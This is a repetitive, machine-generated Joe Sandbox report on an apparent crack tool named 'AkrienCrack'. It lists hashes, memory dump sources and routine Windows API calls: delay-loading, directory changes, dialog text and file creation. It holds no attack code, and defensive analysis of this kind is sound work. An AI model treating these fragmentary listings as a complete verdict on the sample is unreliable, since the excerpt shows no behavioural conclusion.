              • Opcode ID: 8aeaf39b6271d1d068f27a2818d47a114ddc07173f2e5c6dad1a4365c2fdf60d
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: 8aeaf39b6271d1d068f27a2818d47a114ddc07173f2e5c6dad1a4365c2fdf60d
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: bb19e38e143bb3430de3d6214006fa9b68f64d695747c6c5453d286a9ef23e38
              • Instruction ID: 829117a70eaf93670f7fca149764e4fd72e51366f6f1a7ee31b9e2575dd8e768
              • Opcode Fuzzy Hash: bb19e38e143bb3430de3d6214006fa9b68f64d695747c6c5453d286a9ef23e38
              • Instruction Fuzzy Hash: 0CA0029556D502BD712862516D56F36029DC4C5B5333486D9B85A940D19540584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8970a8a9cbc50e1a8439ba38938af8e16a924a215ff41ce7c590cda33a3b9fde
              • Instruction ID: 1139ba3be5f567459b7dc99197d6eed3f7a5322b905f15e9274b43ed82e4b6e6
              • Opcode Fuzzy Hash: 8970a8a9cbc50e1a8439ba38938af8e16a924a215ff41ce7c590cda33a3b9fde
              • Instruction Fuzzy Hash: 0EA001A62AD602BD7168B262AD5AF3B02DCD4D0B2333087EAB91AA4099A984584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7586fc476dd2e48b7c106f63d28604397fe72cb8fa32a1b9f2e4293e2eec9fef
              • Instruction ID: 987ca8631a4398c38318a5105b0e504c7e83deba39e31165afd30712744c6e33
              • Opcode Fuzzy Hash: 7586fc476dd2e48b7c106f63d28604397fe72cb8fa32a1b9f2e4293e2eec9fef
              • Instruction Fuzzy Hash: A9A001A62AD202BD7128B262AD5AF3B02DCC4C4B623308BEAB91A94099A984584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 35278a41aeaad3a019bd0c1fc221799a452efb209e57e675d5d913547a0f294e
              • Instruction ID: 987ca8631a4398c38318a5105b0e504c7e83deba39e31165afd30712744c6e33
              • Opcode Fuzzy Hash: 35278a41aeaad3a019bd0c1fc221799a452efb209e57e675d5d913547a0f294e
              • Instruction Fuzzy Hash: A9A001A62AD202BD7128B262AD5AF3B02DCC4C4B623308BEAB91A94099A984584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a99623f75c90171dc281be73172e4f589f00dfb463056609fcae5e61195fe07c
              • Instruction ID: 987ca8631a4398c38318a5105b0e504c7e83deba39e31165afd30712744c6e33
              • Opcode Fuzzy Hash: a99623f75c90171dc281be73172e4f589f00dfb463056609fcae5e61195fe07c
              • Instruction Fuzzy Hash: A9A001A62AD202BD7128B262AD5AF3B02DCC4C4B623308BEAB91A94099A984584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f4d55e5a8fda4ef586e6ce4c7701d10a89298fe45d1b50ad3fe6b1be69a2e42e
              • Instruction ID: 987ca8631a4398c38318a5105b0e504c7e83deba39e31165afd30712744c6e33
              • Opcode Fuzzy Hash: f4d55e5a8fda4ef586e6ce4c7701d10a89298fe45d1b50ad3fe6b1be69a2e42e
              • Instruction Fuzzy Hash: A9A001A62AD202BD7128B262AD5AF3B02DCC4C4B623308BEAB91A94099A984584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 4b4482d175cb09d35197a8336b2fa11328813bcf06a726d744e91f0232cb2f14
              • Instruction ID: 987ca8631a4398c38318a5105b0e504c7e83deba39e31165afd30712744c6e33
              • Opcode Fuzzy Hash: 4b4482d175cb09d35197a8336b2fa11328813bcf06a726d744e91f0232cb2f14
              • Instruction Fuzzy Hash: A9A001A62AD202BD7128B262AD5AF3B02DCC4C4B623308BEAB91A94099A984584D5C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 4e4fc5742cbaad89da383ab2e302057eb7fdc90a61537859d8ccd0a7e0a71cf5
              • Instruction ID: a62c17c9c8e6f012ad3433c029c3b1540432b0ca3cf2ab54abf5a2d737f05299
              • Opcode Fuzzy Hash: 4e4fc5742cbaad89da383ab2e302057eb7fdc90a61537859d8ccd0a7e0a71cf5
              • Instruction Fuzzy Hash: EBA011AA2AC203BC302C22002C0BF3A02ACC0C0B223308ACAB80A802A0AA800C0C0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1b6f684ffb6d26e837c3ea3a43bc1fcb2860182a5b93d8328821b80274a97df9
              • Instruction ID: a62c17c9c8e6f012ad3433c029c3b1540432b0ca3cf2ab54abf5a2d737f05299
              • Opcode Fuzzy Hash: 1b6f684ffb6d26e837c3ea3a43bc1fcb2860182a5b93d8328821b80274a97df9
              • Instruction Fuzzy Hash: EBA011AA2AC203BC302C22002C0BF3A02ACC0C0B223308ACAB80A802A0AA800C0C0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 303b127939807c2bd79b34796914287c931d1adbe0aa1d71939ab0773554e2d9
              • Instruction ID: a62c17c9c8e6f012ad3433c029c3b1540432b0ca3cf2ab54abf5a2d737f05299
              • Opcode Fuzzy Hash: 303b127939807c2bd79b34796914287c931d1adbe0aa1d71939ab0773554e2d9
              • Instruction Fuzzy Hash: EBA011AA2AC203BC302C22002C0BF3A02ACC0C0B223308ACAB80A802A0AA800C0C0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8742c1bf854b15db3ebca469a16e0ec7712a5e456722bc40312b59f43a09a957
              • Instruction ID: a62c17c9c8e6f012ad3433c029c3b1540432b0ca3cf2ab54abf5a2d737f05299
              • Opcode Fuzzy Hash: 8742c1bf854b15db3ebca469a16e0ec7712a5e456722bc40312b59f43a09a957
              • Instruction Fuzzy Hash: EBA011AA2AC203BC302C22002C0BF3A02ACC0C0B223308ACAB80A802A0AA800C0C0830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 37fb1a30344ba1ab063dfe510fab10e5024c986582fac4ded53b7c8a562b4132
              • Instruction ID: 7539cb39e9fedaebd678be4fb18feb82044c1b90a3f55ca58d1b93b58e7c4d17
              • Opcode Fuzzy Hash: 37fb1a30344ba1ab063dfe510fab10e5024c986582fac4ded53b7c8a562b4132
              • Instruction Fuzzy Hash: A3A0129516C202BC301C21006C02F36029CC0C0B123308ECDB80B9005095801C0C4830
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 76b87a437f29f34d9c822c91f161be9d73dfda490b2250e0c4c1847e0327adb0
              • Instruction ID: 7539cb39e9fedaebd678be4fb18feb82044c1b90a3f55ca58d1b93b58e7c4d17
              • Opcode Fuzzy Hash: 76b87a437f29f34d9c822c91f161be9d73dfda490b2250e0c4c1847e0327adb0
              • Instruction Fuzzy Hash: A3A0129516C202BC301C21006C02F36029CC0C0B123308ECDB80B9005095801C0C4830
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,00B5A587,C:\Users\user\AppData\Local\Temp,00000000,00B8946A,00000006), ref: 00B5A326
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: bf89860fd668830d8b990c50ba500508988b6c4eaa3ae0885526430c5d96c87f
              • Instruction ID: 7f9abd5c24bc3a54aee7a024331a1e1557bbb135245d3f071ceaf03a5a05e61b
              • Opcode Fuzzy Hash: bf89860fd668830d8b990c50ba500508988b6c4eaa3ae0885526430c5d96c87f
              • Instruction Fuzzy Hash: A2A01230194006568A000B30CC09C1577905760B02F0086207006C14A0CF308854B500
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B5B971
              • EndDialog.USER32(?,00000006), ref: 00B5B984
              • GetDlgItem.USER32(?,0000006C), ref: 00B5B9A0
              • SetFocus.USER32(00000000), ref: 00B5B9A7
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B5B9E1
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B5BA18
              • FindFirstFileW.KERNEL32(?,?), ref: 00B5BA2E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B5BA4C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5BA5C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B5BA78
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B5BA94
              • _swprintf.LIBCMT ref: 00B5BAC4
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B5BAD7
              • FindClose.KERNEL32(00000000), ref: 00B5BADE
              • _swprintf.LIBCMT ref: 00B5BB37
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B5BB4A
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B5BB67
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B5BB87
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5BB97
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B5BBB1
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B5BBC9
              • _swprintf.LIBCMT ref: 00B5BBF5
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B5BC08
              • _swprintf.LIBCMT ref: 00B5BC5C
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B5BC6F
                • Part of subcall function 00B5A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B5A662
                • Part of subcall function 00B5A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00B7E600,?,?), ref: 00B5A6B1
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: e63714385a085d7ef4c9242b4c95bdce856974226b9179ec9637286b93462203
              • Instruction ID: 2daf9f5ed823bfad4ecb0d81c53527ab3f582ad2e0e2627e33b9a5c3a446239d
              • Opcode Fuzzy Hash: e63714385a085d7ef4c9242b4c95bdce856974226b9179ec9637286b93462203
              • Instruction Fuzzy Hash: C691B672244348BBD6319BA4DD89FFB77ECEB4A701F040899FB49D3091DB7196098762
              APIs
              • __EH_prolog.LIBCMT ref: 00B47191
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00B472F1
              • CloseHandle.KERNEL32(00000000), ref: 00B47301
